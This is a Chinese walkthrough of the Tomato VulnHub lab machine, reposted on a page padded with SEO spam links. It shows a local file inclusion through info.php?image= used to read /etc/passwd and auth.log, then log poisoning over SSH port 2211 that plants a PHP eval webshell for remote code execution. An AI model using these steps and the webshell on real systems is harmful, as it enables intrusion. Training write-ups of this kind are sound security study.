当前位置: 首页 > wzjs >正文

做图标的网站seo推广系统排名榜

做图标的网站,seo推广系统排名榜,多少钱可以起诉对方,北京做手机网站建设下载靶机ova文件,下载地址:https://download.vulnhub.com/tomato/Tomato.ova 解压导入VMware,修改该虚拟机的网卡模式为NAT模式。 1. 打开虚拟机Tomato 2. 打开kali,nmap扫描主机,寻找靶机ip 判断出靶机ip为192.168.1…

下载靶机ova文件,下载地址:https://download.vulnhub.com/tomato/Tomato.ova

解压导入VMware,修改该虚拟机的网卡模式为NAT模式。

1. 打开虚拟机Tomato

2. 打开kali,nmap扫描主机,寻找靶机ip

判断出靶机ip为192.168.182.153,同时ftp 21端口、http 80端口、sun-answerbook 8888端口状态均是开启。

3. 浏览器访问ip以及可利用的端口80 、 8888

ip:80端口

ip:8888端口    出现输入框

4. 使用kali的dirb进行目录扫描

输入:dirb "http://192.168.182.153"

发现 /antibot_image/        index.html          server-status

Index of /antibot_image/antibots

5.依次访问/antibot_image/  、 index.html  、 server-status

http://192.168.182.153/antibot_image/      发现存在目录

http://192.168.182.153/server-status    无权限访问

6.进一步查看/antibot_image/的目录

发现一个info.php文件

点击info.php文件,发现有PHP信息,显示:Linux系统,/etc/

发现:存在allow_url_fopen On,allow_url_include Off .

 7.查看 info.php页面的源代码

【allow_url_include Off】,发现include()高危函数,可能存在文件包含漏洞

参数

8.  include通过GET方式传image参数

image参数赋值查看/etc/passwd用户配置文件

根据上图,判断路径为:../../../../../etc/passwd

如果判断不清,可以一层一层往外切,每一个../向上一级切换一层

输入:http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../etc/passwd

在页面最下方发现,文件内容显示在页面上            则存在文件包含漏洞

 

9.利用文件包含漏洞,查看日志文件 

输入:http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

10.  查看远程连接ssh端口是否开始

kali,输入:nmap -A -T4 -p- 192.168.182.153

 -A:使用所有高级扫描选项

-T4:设置时许,越高扫描越快

-p-:全端口扫描

发现ssh端口是开启的,2211

 11. 利用远程连接端口ssh 2211和日志记录,写入一句话木马

 URL输入:http://192.168.182.153:2211/<?php @eval($_POST['cmd']);?>

再次查看日志:

http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

发现木马:'GET /%3C?php%20@eval($_POST[%27cmd%27]);?%3E HTTP/1.1'

12. 使用蚁剑连接   查看日志的网址

在查看日志的页面已经写入完整的一句话木马,使用蚁剑进行连接。

 

参考其他技术分享,进行练习

Tomato  文件包含靶机  练习结束  

练习中存在一些磕磕绊绊,结果得到的有点曲折。

即使对大家有一点点帮助,

拜拜!                                                                                         --------------2025/3/12   23:21

http://www.dtcms.com/wzjs/354241.html

相关文章:

  • 竖排导航网站网络营销的三种方式
  • 中信建设有限责任公司资质谷歌seo优化公司
  • 杭州建设网站哪家好seo公司哪家好用
  • 做网站需要学些什么条件广州网站制作公司
  • 最牛的网站建设网络推广工作好吗
  • 日本政府网站建设经验镇江市网站
  • 企业网站制作 西安如何做网站网页
  • 手机可以做网站全国疫情排行榜最新情况列表
  • 传奇免费网站模板下载网络推广是什么工作内容
  • 动态域名可以做网站吗seo范畴
  • 先做网站还是先域名备案求职seo
  • 哪里做外贸网站盘搜搜
  • 深圳高端网站建设报价品牌营销策划ppt
  • 中山企业营销型网站制作百度搜索网站排名
  • 做计算机网站的总结重庆疫情最新情况
  • 网站编辑是做网页编辑吗seo如何优化网站推广
  • 网站开发费用清单北京seo技术
  • 郑州网站关键词优化外包网络安全培训
  • mvc电子商务网站开发推广平台的方法
  • 浙江王氏生态建设网站黑河seo
  • 深圳网站建设制作哪家口碑好佛山百度推广公司
  • 网站正能量破解版下载大全安装热门网站排名
  • 枣庄公司做网站如何优化搜索引擎的准确性
  • 手机网站制作流程图温州网站建设开发
  • 广西省住房和城乡建设厅官方网站百度关键词推广公司哪家好
  • php网站 config外链链接平台
  • 禹城网站定制长春做网站推广的公司
  • 杭州 企业门户网站建设网络服务商在哪咨询
  • 自学网站开发深圳网络营销网站设计
  • 通化 网站建设大数据营销系统